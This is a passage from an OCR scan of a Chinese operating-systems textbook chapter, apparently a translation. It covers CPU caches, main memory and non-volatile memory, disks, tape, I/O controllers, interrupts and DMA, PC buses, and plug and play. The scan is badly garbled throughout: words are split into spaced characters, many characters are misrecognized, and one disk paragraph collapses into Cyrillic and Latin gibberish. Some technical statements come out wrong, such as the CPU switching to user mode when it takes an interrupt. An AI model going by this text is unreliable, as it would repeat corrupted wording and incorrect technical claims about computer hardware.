下 ,其 存储 容量 都 小 于 1 KB。 程 序 必须 在 软件 中 自行 管理 这 些 寄存 器 ( 即 决定 如 何 使 用 它们 ) 。 

下 一 层 是 高 速 缓存 ， 它 多 数 由 硬件 控制 。 主 存 被 分 割 成 高 加 继 存 行 (cache line) ， 其 典型 大 小 为 64 
个 字 节 ， 地 址 0 至 63 对 应 高 速 缓存 行 0， 地 址 64 至 127 对 应 高 速 缓存 行 1， 以 此 类 推 。 最 常用 的 高 速 缓存 行 
放置 在 CPU 内 部 或 者 非常 接近 CPU 的 高 速 缓存 中 。 当 某 个 程序 需要 读 一 个 存储 字 时 ， 高 速 缓存 硬件 检查 
所 需要 的 高 速 缓存 行 是 否 在 高 速 缓存 中 。 如 果 是 ， 称 为 高 速 二 让 命 中 ， 缓 存 满足 了 请 求 ， 就 不 需要 通过 
总 线 把 访问 请 求 送 往 主 存 。 高 速 缓存 命中 通常 需要 两 个 时 钟 周期 。 高 速 缓存 未 命中 就 必须 访问 内 存 ， 这 
要 付出 大 量 的 时 间 代 价 。 由 于 高 速 缓存 的 价格 昂贵 ， 所 以 其 大 小 有 限 。 有 些 机 器 具有 两 级 甚至 三 级 高 束 
缓存 ， 每 一 级 高 速 缓存 比 前 一 级 慢 且 容量 更 大 。 

缓存 在 计算 机 科学 的 许多 领域 中 起 着 重要 的 作用 ， 并 不 仅仅 只 是 RAM 的 缓存 行 。 只 要 存在 大 量 的 
资源 可 以 划分 为 小 的 部 分 ， 那 么 ， 这 些 资源 中 的 某 些 部 分 就 会 比 其 他 部 分 更 频繁 地 得 到 使 用 ， 通 常 缓存 
的 使 用 会 带 来 性 能 上 的 改善 。 操 作 系统 一 直 在 使 用 缓存 。 例 如 ， 多 数 操作 系统 在 内 存 中 保留 频繁 使 用 的 
文件 (的 一 部 分 )， 以 避免 从 磁盘 中 重复 地 调 取 这 些 文件 。 相 似 地 ， 关 似 于 
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的 长 路 径 名 转换 成 文件 所 在 的 磁盘 地 址 的 结果 ， 也 可 以 放 入 缓存 ， 以 避免 重复 寻找 地 址 。 还 有 ， 当 一 个 
Web 页 面 (URL) 的 地 址 转换 为 网 络 地 址 (IP 地 址 ) 后 ， 这 个 转换 结果 也 可 以 缓存 起 来 以 供 将 来 使 用 。 
还 有 许多 其 他 的 类 似 的 应 用 。 3 

在 任何 缓存 系统 中 ， 都 有 若干 需要 尽快 考虑 的 问题 ， 包 括 ; 

1) 何 时 把 一 个 新 的 内 容 放 人 缓存 。 

2) 把 新 内 容 放 在 缓存 的 哪 一 行 上 。 

3) 在 需要 时 ， 应 该 把 哪个 内 容 从 缓存 中 移 走 。 

D 应 该 把 新 移 走 的 内 容 放 在 某 个 较 大 存储 器 的 何 处 。 

并 不 是 每 个 问题 的 解决 方案 都 符合 每 种 缓存 处 理 。 对 于 CPU 缓存 中 的 主 存 缓存 行 ， 每 当 有 缓存 未 命中 时 ， 
就 会 调和 新 的 内 容 。 通 常 通过 所 引用 内 存 地 址 的 高 位 计算 应 该 使 用 的 缓存 行 。 例 如 ， 对 于 64 字 节 的 4096 缓 
存 行 ， 以 及 32 位 地 址 ， 其 中 6~ 17 位 用 来 定位 缓存 行 ， 而 0 一 5 位 则 用 来 确定 缓存 行 中 的 字 节 。 在 这 个 例子 
中 ， 被 移 走 内 容 的 位 置 就 是 新 数据 要 进入 的 位 置 ， 但 是 在 有 的 系统 中 未 必 是 这 样 。 最 后 ， 当 将 -个 缓存 行 
的 内 容重 写 进 主 存 时 (该 内 容 被 缓存 后 ， 可 能 会 被 修改 ) ， 通 过 该 地 址 来 惟一 确定 需 重 写 的 主 存 位 置 。 

缓存 是 一 种 好 方法 ， 所 以 现代 CPU 中 设计 了 两 个 缓存 。 第 一 级 或 称 为 L1 线 看 总 是 在 CPU 中 ， 通 党 
用 来 将 已 解码 的 指令 调 入 CPU 的 执行 引擎 。 对 于 那些 频繁 使 用 的 数据 字 ， 多 数 芯片 安排 有 第 二 个 LI 缓存。 
典型 的 L1 缓 存 大 小 为 16KB。 另 外 ， 往 往 还 设计 有 二 级 缓存 ， 称 为 L2 线 存 ， 用 来 存放 近来 所 使 用 过 若干 
兆 字 节 的 内 存 字 。L1 和 L2 缓 存 之 间 的 差别 在 于 时 序 。 对 LI1 缓 存 的 访问 ， 不 存在 任何 延 时 ， 而 对 L2 缓 存 
的 访问 ， 则 会 延 时 1 或 2 个 时 钟 周期 。 

在 多 核 芯 片 中 。 设 计 师 必须 确定 缓存 的 位 置 。 在 图 1-8a 中 ， 一 个 L2? 缓 存 被 所 有 的 核 共享 。Intel 多 核 
芯片 采用 了 这 个 方法 。 相 反 ， 在 图 1-8b 中 ， 每 个 核 有 其 自己 的 L2 缓 在 。AMD 采 用 这 个 方法 。 不 过 每 种 
策略 都 有 自己 的 优 缺 点 。 例 如 ，Intel 的 共享 L2 缓 存 需要 有 一 -种 更 复杂 的 缓存 控制 器 ， 而 AMD 的 方式 在 
设法 保持 L2 缓 在 一 致 性 上 存在 困难 。 
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在 图 1-9 的 层次 结构 中 ， 再 往 下 一 层 是 主 存 。 这 是 存储 器 系统 的 主力 。 主 存 通常 称 为 随机 访问 存储 
器 (Random Access Memory，RAM)。 过 去 有 时 称 之 为 厂 芯 存储 器 ， 因为 在 20 世 纪 50 年 代 和 60 年 代 ， 使 
用 很 小 的 可 磁化 的 铁 磁体 制作 主 存 。 目 前 ， 存储 器 的 容量 在 几 百 兆 字 节 到 若干 吉 字 节 之 间 ， 并 且 其 容量 
正在 迅速 增长 。 所 有 不 能 在 高 速 缓存 中 得 到 满足 的 访问 请 求 都 会 转 往 主 存 。 

除了 主 存 之 外 ， 许 多 计算 机 已 经 在 使 用 少量 的 非 易 失 性 随机 访问 存储 器 。 它们 与 RAM 不 同 ， 在 电 
源 切 断 之 后 ， 非 易 失 性 随机 访问 存储 器 并 不 丢失 其 内 容 。 只 读 存储 器 (Read Only Метогу, КОМ) 在 
工厂 中 就 被 编程 完毕 ， 然 后 再 也 不 能 被 修改 。ROM 速 度 快 且 便宜 。 在 有 些 计 算 机 中 ， 用 于 启动 计算 机 
的 引导 加 载 模块 就 存放 在 ROM 中 。 另 外 ， - 些 IO 卡 也 采用 ROM 处 理 底层 设备 控制 。 

EEPROM (Electrically Erasable PROM， 电 可 擦 除 可 编程 RDOM) 和 闪存 (flash memory) 也 是 非 易 
失 性 的 ， 但 是 与 ROM 相 反 ， 它 们 可 以 擦 除 和 重 写 。 不 过 重 写 它们 需要 比 写 人 RAM 更 高 数量 级 的 时 间 ， 
所 以 它们 的 使 用 方式 与 ROM 相 同 ， 而 其 与 众 不 同 的 特点 使 它们 有 可 能 通过 字段 重 写 的 方式 纠正 所 保存 
程序 中 的 错误 。 

在 使 携 式 电子 设备 中 ， 闪存 通常 作为 存储 媒介 .。 闪存 是 数码 相机 中 的 胶卷 ,是 便携 式 音乐 播放 器 的 
磁盘 ， 这 仅仅 是 闪存 用 途中 的 两 项 。 闪存 在 速度 上 介 于 RAM 和 磁盘 之 间 。 另 外 ， 与 磁盘 存储 器 不 同 ， 
如 果 内 存 擦 除 的 次 数 过 多 ， 就 被 磨损 了 。 

还 有 一 类 存储 器 是 CMOS， 它 是 易 失 性 的 。 许多 计算 机 利用 CMOS 存 储 器 保持 当前 时 间 和 日 期 。 
CMOS 存 储 器 和 递增 时 间 的 时 钟 电路 由 一 块 小 电池 驱动 ， 所 以 即使 计算 机 没有 上 电 ， 时 间 也 仍然 可 以 
正确 地 更 新 。CMOS 存 储 器 还 可 以 保存 配置 参数 ， 诸 如 ， 哪 一 个 是 启动 磁盘 等 。 之 所 以 采用 CMOS 是 因 
为 它 消耗 的 电能 非常 少 ， 一 块 工 原装 的 电池 往往 就 能 使 用 若干 年 。 但 是 ， 当 电池 开始 失效 时 ， 计算 机 
就 会 出 现 “Alzheimer 病 症 ” 9 计算 机 会 忘记 掉 记 忆 多 年 的 事物 ， 比如 应 该 由 哪个 磁盘 启动 等 。 


1.3.3 磁盘 

下 一 个 层次 是 磁盘 硬盘)。 磁 盘 同 RAM 相 比 ， 每 个 二 进 制 位 的 成 本 低 了 两 个 数量 级 ， 而 且 经 常 也 
有 两 个 数量 级 大 的 容量 。 磁 盘 惟一 的 问题 是 随机 访问 
数据 时 间 大 约 慢 了 三 个 数量 级 。 其 低速 的 原因 是 因为 。 gg 面 7 一 一 WSK 
磁盘 是 一 种 机 械 装置 ， 如 图 1-10 所 示 。 (每 个 盘面 1 个 ) 

在 一 个 磁盘 中 有 一 个 或 多 个 金属 盘 片 ， 它 们 以 
5400，7200 或 10 800rpm 的 速度 旋转 。 从 边缘 开始 有 一 
个 机 械 轿 基 横 在 盘面 上 ， 这 类 似 于 老式 播放 塑料 唱片 33 
转 唱机 上 的 拾 音 臂 。 信 息 写 在 磁盘 上 的 一 系列 同心 园 上 。 
在 任意 一 个 给 定 避 的 位 置 ， 每 个 磁头 可 以 读 取 一 段 环形 
区 域 ， 称 为 磁道 (track)。 把 一 个 给 定 臂 的 位 置 上 的 所 
有 卫 道 合并 起 来 ， 组 成 了 一 个 柱 面 (cylinder)。 

每 个 磁道 划分 为 若干 扇 区 ， 遍 区 的 典型 值 是 512 и г 
字 节 。 在 现代 磁盘 中 ， 较 外 面 的 柱 面 比较 内 部 的 柱 面 ко жаканын 
ЖЯ ФИ. АВЕРИН НЕСЕ т. ТБ УЕА ВНЕ ЖУ 
SmsElOms, ДДВ 05) 8. URRA ERORE, BARAIG ER EEE 
BIERZ T, ФНЛ Т SmE Отв Е, EEEH FEARR, -NEENAKE 
磁头 之 下 ， 就 开始 读 写 ， 低 端 硬盘 的 速率 是 5MB/s， 而 高 速 磁盘 的 速率 是 160 MB/s, 

许多 计算 机 支持 一 种 著名 的 虚拟 内 在 机 制 ， 这 将 在 第 3 章 中 讨论 。 这 种 机 制 使 得 期 望 运行 大 于 物理 
内 存 的 程序 成 为 可 能 ， 其 方法 是 将 程序 放 在 磁盘 上 ， 而 将 主 存 作为 一 种 缓存 ， 用 来 保存 最 频繁 使 用 的 部 
分 程序 。 这 种 机 制 需要 快速 地 映像 内 存 地 址 ， 以 便 把 程序 生成 的 地 址 转换 为 有 关 字 节 在 RAM 中 的 物理 
地 址 。 这 种 映像 由 CPU 中 的 一 个 部 件 ， 称 为 存储 器 管理 单元 (Memory Management Unit，MMU) 来 完 
成 ， 如 图 1-6 所 示 。 


Ө 一 种 病因 未 明 的 原 发 过 行 性 大 脑 疾 病 ， 以 记忆 受 损 为 主要 特征 ， 是 老年 性 痴呆 中 最 常见 的 一 种 类 型 。 一 一 译 者 注 
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缓存 和 MMU 的 出 现 对 系统 的 性 能 有 着 重要 的 影响 。 在 多 道 程序 系统 中 ， 从 一 个 程序 切换 到 另 一 个 
程序 ， 有 时 称 为 上 下 文 切换 (context switch), ， 有 必要 对 缓存 中 来 的 所 有 修改 过 的 块 进行 写 回 磁盘 操作 ， 
并 修改 MMU 中 的 映像 寄存 器 。 但 是 这 两 种 操作 的 代价 很 郧 贵 ， 所 以 程序 员 们 努力 避免 使 用 这 些 操作 。 
我 们 稍 后 将 看 到 这 些 操 作 产 生 的 影响 。 


1.3.4 磁带 

在 存储 器 体系 中 的 最 后 一 层 是 磁带 。 这 种 介质 经 常用 于 磁盘 的 备份 ， 并 且 可 以 保存 非常 大 量 的 数据 
集 。 在 访问 磁带 前 ， 首 先 要 把 磁带 装 到 磁带 机 上 ， 可 以 人 工 安 装 也 可 用 机 器 人 安装 (在 大 型 数据 库 中 通 
常安 装 有 自动 磁带 处 理 设备 )。 然 后 ， 磁带 可 能 还 需要 向 前 绕 转 以 便 读 取 所 请 求 的 数据 块 。 总 之 ， 这 一 
切 工作 要 花费 几 分 钟 。 磁 带 的 最 大 特点 是 每 个 二 进 制 位 的 成 本 极其 便宜 ， 并 且 是 可 移动 的 ， 这 对 于 为 了 
能 在 火灾 、 洪 水 、 地 震 等 灾害 中 存活 下 来 ， 必 须 离线 存储 的 备份 磁带 而 言 是 非常 重要 的 。 

我 们 已 经 讨论 过 的 存储 器 体系 结构 是 典型 的 ， 但 是 有 的 安装 系统 并 不 具备 所 有 这 些 ， 或 者 有 所 差 
B 《诸如 光盘 )。 不 过 ， 在 所 有 的 系统 中 ， 当 层次 下 降 时 ， 其 随机 访问 时 间 则 明显 地 增加 ， 容量 也 同样 明显 
地 增加 ， 而 每 个 二 进 制 位 的 成 本 则 大 幅度 下 降 。 其 结果 是 ， 这 种 存储 器 体系 结构 似乎 还 要 伴随 我 们 多 年 。 


1.3.5 VO 设 备 

CPU 和 存储 器 不 是 操作 系统 惟一 需要 管理 的 资源 。 Jo 设备 也 与 操作 系统 有 密切 的 相互 影响 。 如 图 1-6 
所 示 ，1/O 设 备 一 般 包 括 两 个 部 分 : 设备 控制 器 和 设备 本 身 。 控制 器 是 插 在 电路 板 上 的 一 块 芯片 或 一 组 芯 
片 ， 这 块 电路 板 物理 地 控制 设备 。 它 从 操作 系统 接收 命令 ， 例 如 ， 从 设备 读数 据 ， 并 且 完 成 数据 的 处 理 。 

在 许多 情形 下 ， 对 这 些 设备 的 控制 是 非常 复杂 和 具体 的 ， 所 以 ， 控制 器 的 任务 是 为 操作 系统 提供 一 
个 简单 的 接口 (不 过 还 是 很 复杂 的 )。 例 如 ， 磁盘 控制 器 可 以 接受 一 个 命令 从 磁盘 2 读 出 11206 号 扁 区 ， 
然后 ， 控 制 器 把 这 个 线性 遍 区 号 转化 为 柱 面 、 遍 区 和 磁头 。 由 于 外 柱 面 比 内 柱 面 有 较 多 的 扁 区 ， 而 且 -- 
些 坏 扇 区 已 经 被 映射 到 磁盘 的 其 他 地 方 ， 所 以 这 种 转换 将 是 很 复杂 的 。 磁盘 控制 器 必须 确定 磁头 臂 应 该 
在 哪个 柱 面 上 ， 并 对 磁头 臂 发 出 一 串 脉冲 使 其 前 后 移动 到 所 要 求 的 柱 面 号 上 ， 接着 必须 等 待 对 应 的 扁 区 
转动 到 磁头 下 面 并 开始 读 出 数据 ， 随 着 数据 从 驱动 器 读 出 ， 要 消去 引导 块 并 计算 校 验 和 。 最 后 ， 还 得 把 
输入 的 二 进 制 位 组 成 字 并 存放 到 存储 器 中 。 为 了 要 完成 这 些 工作 ， 在 控制 器 中 经 常安 装 一 个 小 的 嵌入 式 
计算 机 ， 该 代入 式 计算 机 运行 为 执行 这 些 工作 而 专门 编 好 的 程序 。 

IO 设备 的 另 一 个 部 分 是 实际 设备 的 自身 。 设备 本 身 有 个 相对 简单 的 接口 ， 这 是 因为 接口 既 不 能 做 
很 多 工作 ， 又 已 经 被 标准 化 了 。 标 准 化 是 有 必要 的 ， 这 样 任何 一 个 LIDE 磁 盘 控 制 器 就 可 以 适应 任 一 种 
IDE 了 磁盘， 例如 ，IDE 表 示 信 成 驱动 器 电子 设备 【Integrated Drive Electronics), 是 许多 计算 机 的 磁盘 标 
准 。 由 于 实际 的 设备 接口 隐藏 在 控制 器 中 ， 所 以 ， 操作 系统 看 到 的 是 对 控制 器 的 接口 ， 这 个 接口 可 能 和 
设备 接口 有 很 大 的 差别 。 

每 类 设备 控制 器 都 是 不 同 的 ， 所 以 ， 需要 不 同 的 软件 进行 控制 。 专 门 与 控制 器 对 话 ， 发 出 命令 并 接收 
响应 的 软件 ， 称 为 设备 驱动 程序 (device driver), 每 个 控制 器 厂家 必须 为 所 支持 的 操作 系统 提供 相应 的 设备 
驱动 程序 。 例 如 ， 一 台 扫描 仪 会 配 有 用 于 Windows 2000, Windows ХР. Vista 以 及 Linux 的 设备 驱动 程序 。 

为 了 能 够 使 用 设备 驱动 程序 ， 必须 把 设备 驱动 程序 装 入 到 操作 系统 中 ， 这 样 它 可 在 核心 态 中 运行 。 
理论 上 ， 设 备 驱动 程序 可 以 在 内 核 外 运行 ， 但 是 几乎 没有 系统 支持 这 种 可 能 的 方式 ， 因为 它 要 求 允 许 在 
用 户 空间 的 设备 驱动 程序 能 够 以 控制 的 方式 访问 设备 ， 这 是 一 种 极 少 得 到 支持 的 功能 。 要 将 设备 驱动 程 
序 装 入 操作 系统 ， 有 三 个 途径 。 第 一 个 途径 是 将 内 核 与 设备 驱动 程序 重新 链接 ， 然后 重启 动 系统 。 许 多 
UNIX 系 统 以 这 种 方式 工作 。 第 二 个 途径 是 在 一 个 操作 系统 文件 中 设置 一 个 人 口 ， 并 通知 该 文件 需要 一 
个 设备 驱动 程序 ， 然 后 重启 动 系统 。 在 系统 启动 时 ， 操作 系统 去 找寻 所 需 的 设备 驱动 程序 并 装载 之 。 
Windows 就 是 以 这 种 方式 工作 。 第 三 种 途径 是 ， 操作 系统 能 够 在 运行 时 接受 新 的 设备 驱动 程序 并 且 立 即 
将 其 安装 好 ， 无 须 重启 动 系统 。 这 种 方式 采用 的 较 少 ， 但 是 这 种 方式 正在 变 得 普及 起 来 。 热 插 拔 设备 ， 
诸如 USB 和 IEEE1394 设 备 (后 面 会 讨论 ) 都 需要 动态 可 装载 设备 驱动 程序 。 

每 个 设备 控制 器 都 有 少量 的 用 于 通信 的 寄存 器 。 例 如 ， 一 个 最 小 的 磁盘 控制 器 也 会 有 用 于 指定 磁盘 
地 址 、 内 存 地址 、 扁 区 计数 和 方向 ( 读 或 写 ) 的 寄存 器 。 要 激活 控制 器 ， 设备 驱动 程序 从 操作 系统 获得 
一 条 命令 ， 然 后 翻译 成 对 应 的 值 ， 并 写 进 设备 寄存 器 中 。 所 有 设备 寄存 器 的 集合 构成 了 IO 端口 空间 ， 
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我 们 将 在 第 5 章 讨论 有 关内 容 。 

在 有 些 计算 机 中 ， 设 备 寄 存 器 被 映射 到 操作 系统 的 地 址 空间 (操作 系统 可 使 用 的 地 址 )， 这 样 ， 它 们 
就 可 以 像 普通 存储 字 一 样 读 出 和 写 人 。 在 这 种 计算 机 中 ， 不 需要 专门 的 1O 指 令 ， 用 户 程序 可 以 被 硬件 阻 
挡 在 外 ， 防 止 其 接触 这 些 存储 器 地 址 (例如 ， 采 用 基 址 和 界限 寄存 器 )。 在 另外 一 些 计算 机 中 ， 设 备 寄存 
器 被 放 入 一 个 专门 的 O 端 口 空 间 中 ， 每 个 寄存 器 都 有 一 个 端口 地 址 。 在 这 些 机 器 中 ， 提 供 在 内 核 态 中 可 
使 用 的 专门 IN 和 OUT 指 令 ， 供 设备 驱动 程序 读 写 这 些 寄存 器 用 。 前 一 种 方式 不 需要 专门 的 MO 指令 ， 但 是 
占用 了 一 些 地 址 空间 。 后 者 不 占用 地 址 空间 ， 但 是 需要 专门 的 指令 。 这 两 种 方式 的 应 用 都 很 广泛 。 

实现 输入 和 输出 的 方式 有 三 种 。 在 最 简单 的 方式 中 ， 用 户 程序 发 出 一 个 系统 调用 ， 内 核 将 其 翻译 成 
一 个 对 应 设备 驱动 程序 的 过 程 调用 。 然 后 设备 驱动 程序 启动 JO 并 在 一 个 连续 不 断 的 循环 中 检查 该 设备 ， 
看 该 设备 是 否 完成 了 工作 (一般 有 一 些 二 进 制 位 用 来 指示 设备 仍 在 忙碌 中 )。 当 IO 结束 后 ， 设 备 驱动 程 
序 把 数据 送 到 指定 的 地 方 〈 若 有 此 需要 ) ， 并 返回 。 然 后 操作 系统 将 控制 返回 给 调用 者 。 这 种 方式 称 为 
忙 等 待 (busy waiting) ， 其 缺点 是 要 占据 CPU，CPU 一 直 轮 询 设备 直到 对 应 的 MO 操作 完成 。 

第 二 种 方式 是 设备 驱动 程序 启动 设备 并 且 让 该 设备 在 操作 完成 时 发 出 一 个 中 断 。 设 备 驱动 程序 在 这 
个 时 刻 返 回 。 操 作 系统 接着 在 需要 时 阻塞 调用 者 并 安排 其 他 工作 进行 。 当 设备 驱动 程序 检测 到 该 设备 的 
操作 完毕 时 ， 它 发 出 一 个 中 断 通知 操作 完成 。 

在 操作 系统 中 ， 中 断 是 非常 重要 的 ， 所 以 需要 更 具体 地 讨论 。 在 图 1-11a 中 ， 有 一 个 LO 的 三 步 过 程 。 
在 第 1 步 ， 设 备 驱动 程序 通过 写 设备 寄存 器 通知 设备 控制 器 做 什么 。 然 后 ， 设 备 控制 器 启动 该 设备 。 当 
设备 控制 器 传送 完毕 被 告知 的 要 进行 读 写 的 字 节 数量 后 ， 它 在 第 2 步 中 使 用 特定 的 总 线 发 信号 给 中 断 控 
制 器 芯片 。 如 果 中 断 控制 器 已 经 准备 接收 中 断 (如 果 正 忙于 一 个 更 高 级 的 中 断 ， 也 可 能 不 接收 )， 它 会 
在 CPU 芯片 的 一 个 管 脚 上 声明 ， 这 就 是 第 3 步 。 在 第 4 步 中 ， 中 断 控 制 器 把 该 设备 的 编号 放 到 总 线 上 ， 这 
样 CPU 可 以 读 总 线 ， 并 且 知 道 哪个 设备 刚刚 完成 了 操作 (可 能 同时 有 许多 设备 在 运行 )。 


中 断 处 理 程序 
а) b) 
图 1-11 а) 启动 一 个 WO 设备 并 发 出 中 断 的 过 程 ，b) 中 断 处 理 过程 包 括 取 中 断 、 


运行 中 断 处 理 程序 和 返回 到 用 户 程序 


一 旦 CPU 决定 取 中 断 ， 通 常 程 序 计数 器 和 PSW 就 被 压 入 当前 堆栈 中 ， 并 且 CPU 被 切换 到 用 户 态 。 
设备 编号 可 以 成 为 部 分 内 存 的 一 个 引用 ， 用 于 寻找 该 设备 中 断 处 理 程序 的 地 址 。 这 部 分 内 存 称 为 中 断 向 
量 (interrupt vector), 当中 断 处 理 程序 (中 断 设备 的 设备 驱动 程序 的 一 部 分 ) 开始 后 ， 它 取 走 已 人 栈 的 
程序 计数 器 和 PSW ， 并 保存 之 ， 然 后 查询 设备 的 状态 。 在 中 断 处 理 程序 全 部 完成 之 后 ， 它 返回 到 先前 运 
行 的 用 户 程序 中 尚未 执行 的 头 一 条 指令 。 这 些 步 骤 如 图 1-11b 所 示 。 

第 三 种 方式 是 ， 为 IO 使 用 一 种 特殊 的 直接 存储 器 访问 【Direct Memory Access, DMA) 芯片 ， 它 
可 以 控制 在 内 存 和 某 些 控制 器 之 间 的 位 流 ， 而 无 须 持 续 的 CPU 干预 。CPU 对 DMA 芯 片 进行 设置 ， 说 明 
需要 传送 的 字 节 数 、 有 关 的 设备 和 内 存 地 址 以 及 操作 方向 ， 接 着 启动 DMA。 当 DMA 芯 片 完 成 时 ， 它 引 
发 一 个 中 断 ， 其 处 理 方式 如 前 所 述 。 有 关 DMA 和 IO 硬件 会 在 第 5 章 中 具体 讨论 。 
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中 断 经 常会 在 非常 不 合适 的 时 刻 发 生 ， 比 如 ， 在 另 一 个 中 断 程序 正在 运行 时 发 生 。 正 由 于 此 ，CPU 
有 办 法 关闭 中 断 并 在 稍 后 再 开启 中 断 。 在 中 断 关闭 时 ， 任 何 已 经 发 出 中 断 的 设备 ， 可 以 继续 保持 其 中 断 
信号 ， 但 是 CPU 不 会 被 中 断 ， 直 至 中 断 再 次 启用 为 止 。 如 果 在 中 断 关 闭 时 ， 已 有 多 个 设备 发 出 了 中 断 ， 
中 上 断 控制 器 将 决定 先 处 理 哪 个 中 断 ， 通 常 这 取决 于 事先 赋予 每 个 设备 的 静态 优先 级 。 最 高 优先 级 的 设备 
赢得 竞争 。 
1.3.6 总 线 

图 1-6 中 的 结构 在 小 型 计算 机 中 使 用 了 多 年 ， 并 也 用 在 早期 的 BM PC 中 。 但 是 ， 随 着 处 理 器 和 存储 
器 速度 越 来 越 快 ， 到 了 某 个 转折 点 时 ， 单 总 线 (当然 还 有 1BM PC 总 线 ) 就 很 难处 理 总 线 的 交通 流量 了 ， 
只 有 放弃 。 其 结果 是 导致 其 他 的 总 线 出 现 ， 它们 处 理 IO 设备 以 及 CPU 到 存储 器 的 速度 都 更 快 。 这 种 演 
化 的 结果 是 ， 目 前 一 台 较 大 的 Pentium 系 统 的 结构 如 图 1-12 所 示 。 
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图 1-12 大 型 Pentium 系 统 的 结构 


图 中 的 系统 有 8 个 总 线 (高 速 缓存 、 局 部 、 内 存 、PCI、SCSI、 USB、IDE 和 ISA)， 每 个 总 线 传输 速 
度 和 功能 都 不 同 。 操作 系统 必须 了 解 所 有 总 线 的 配置 和 管理 。 有 两 个 主要 的 总 线 ， 即 早期 的 IBM PC 
ISA (Industry Standard Architecture) 总 线 和 它 的 后 继 者 PCI (Peripheral Component Interconnect) 总 线 。 
ISA 总 线 就 是 原先 的 IBM PC/AT 总 线 ， 以 8.33MHz 频 率 运 行 ， 可 并 行 传送 2 字 节 ， 最 大 速率 为 16.67MB/s。 
它 还 可 与 老式 的 慢 速 /O 卡 向 后 兼容 。 PCI 总 线 作为 ISA 总 线 的 后 继 者 由 Intel 公 司 发 布 。 它 可 在 66MHz 频 
率 运行 ， 可 并 行 传送 8 字 节 ， 数 据 速率 为 528MB/s。 目前 多 数 高 速 1/O 设 备 采用 PCI 总 线 。 由 于 有 大 量 的 
WO 卡 采 用 PCI 总 线 ， 鞭 至 许多 非 Intel 计 算 机 也 使 用 PCI 总 线 。 现在 ， 使 用 称 为 PCI Express 的 PCI 总 线 升级 
版 的 新 计算 机 已 经 出 现 。 

在 这 种 配置 中 ，CPU 通 过 局 部 总 线 与 PCI 桥 芯片 对 话 ， 而 PCI 桥 芯片 通过 专门 的 存储 总 线 与 存储 器 
对 话 ， 一 般 速率 为 100MHz。Pentium 系 统 在 芯片 上 有 1 级 高 速 缓存 ， 在 芯片 外 有 一 个 非常 大 的 2 级 高 速 组 
存 ， 它 通过 高 速 缓存 总 线 与 CPU 连接 。 

另外 ， 在 这 个 系统 中 有 三 个 专门 的 总 线 : IDE、USB 和 SCSI。 IDE 总 线 将 诸如 磁盘 和 CD-ROM 一 类 
的 外 部 设备 与 系统 相连 接 。 IDE 总 线 是 PC/AT 的 磁盘 控制 器 接口 的 副产品 ， 现在 几乎 成 了 所 有 基于 
Pentium 系 统 的 硬盘 的 标准 ， 对 于 CD-ROM 也 经 常 是 这 样 。 

通用 事 行 总 线 (Universal Serial Bus, USB) 是 用 来 将 所 有 慢 速 IO 设备， 诸如 键盘 和 鼠标 ， 与 计算 
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机 连接 。 它 采用 一 种 小 型 四 针 连 接 器 ， 其 中 两 针 为 USB 设 备 提供 电源 。USB 是 一 种 集中 式 总 线 ， 其 根 设 
备 每 Ims 轮 询 一 次 1/O 设 备 ， 看 是 否 有 信息 收发 。USB1.0 可 以 处 理 总 计 为 1.5MB/s 的 负载 ， 而 较 新 的 
USB2.0 总 线 可 以 有 60MB/s 的 速率 。 所 有 的 USB 设 备 共享 一 个 USB 设 备 驱 动 器 ， 于 是 就 不 需要 为 新 的 
USB 设 备 安装 新 设备 驱动 器 了 。 这 样 ， 无 须 重新 启动 就 可 以 给 计算 机 添加 USB 设 备 。 

SCSI (Small Computer System Interface) 总 线 是 一 种 高 速 总 线 ， 用 在 高 速 硬盘 、 扫 描 仪 和 其 他 需 
要 较 大 带宽 的 设备 上 。 它 最 高 可 达 320MB/s。 自 从 其 发 布 以 来 ，SCSI 总 线 一 直 用 在 Macintosh 系 统 上 ， 
在 UNIX 和 一 些 基于 Intel 的 系统 中 也 很 流行 。 

还 有 一 种 总 线 (图 1-12 中 没有 展示 ) 是 IEEE 1394。 有 时 ， 它 称 为 火线 (FireWire), 严格 来 说 ， 火 
线 是 苹果 公司 具体 实现 1394 的 名 称 。 与 USB 一 样 ，IEEE 1394 是 位 品行 总 线 ， 设 计 用 于 最 快 可 达 
100MB/s 的 包 传送 中 ， 它 适合 于 将 数码 相机 和 类 似 的 多 媒体 设备 连接 到 计算 机 上 。IEEE 1394 与 USB 不 
同 ， 不 需要 集中 式 控制 器 。 

要 在 如 图 1-12 展 示 的 环境 下 工作 ， 操 作 系 统 必须 了 解 有 些 什么 外 部 设备 连接 到 计算 机 上 ， 并 对 它们 
进行 配置 。 这 种 需求 导致 mtel 和 微软 设计 了 一 种 名 为 即 桂 即 用 (plug апа play) 的 IO 系统 ， 这 是 基于 一 
种 首先 被 苹果 Macintosh 实 现 的 类 似 概念 。 在 即 插 即 用 之 前 ， 每 块 1O 卡 有 一 个 固定 的 中 断 请 求 级 别 和 用 
于 其 MO 寄存 器 的 固定 地 址 ， 例 如 ， 键 盘 的 中 断 级 别 是 1， 并 使 用 0x60 至 0x64 的 IO 地 址 ， 软 盘 控 制 器 是 
中 断 6 级 并 使 用 0x3F0 至 0x3F7 的 IO 地 址 ， 而 打印 机 是 中 断 7 级 并 使 用 0x378 至 0x37A 的 IO 地 址 等 。 

到 目前 为 目 ， 一 切 正常 。 比 如 ， 用 户 买 了 一 块 声卡 和 调制 解 调 卡 ， 并 且 它 们 都 是 可 以 使 用 中 断 4 的 ， 
但 此 时 ， 问 题 发 生 了 ， 两 块 卡 互相 冲突， 结果 不 能 在 一 起 工作 。 解 决 方案 是 在 每 块 UO 卡 上 提供 DIP 开 关 
或 跳 接 器 ， 并 指导 用 户 对 其 进行 设置 以 选择 中 断 级 别 和 IO 地 址 ， 使 其 不 会 与 用 户 系统 的 任何 其 他 部 件 冲 
突 。 那 些 热衷 于 复杂 PC 硬件 的 十 几 岁 的 青少年 们 有 时 可 以 不 出 差错 地 做 这 类 工作 。 但 是 ， 没 有 人 能 够 不 
出 错 。 

即 播 即 用 所 做 的 工作 是 ， 系 统 自动 地 收集 有 关 JO 设 备 的 信息 ， 集 中 赋予 中 断 级 别 和 IO 地 址 ， 然 后 
通知 每 块 卡 所 使 用 的 数值 。 这 项 工作 与 计算 机 的 启动 密切 相关 ， 所 以 下 面 我 们 开始 讨论 计算 机 的 启动 。 
不 过 这 不 是 件 轻松 的 工作 。 

1.3.7 启动 计算 机 

Pentium 的 简要 启动 过 程 如 下 。 在 每 个 Pentium 上 有 一 块 双亲 板 (在 政治 上 的 纠正 影响 到 计算 机 产业 
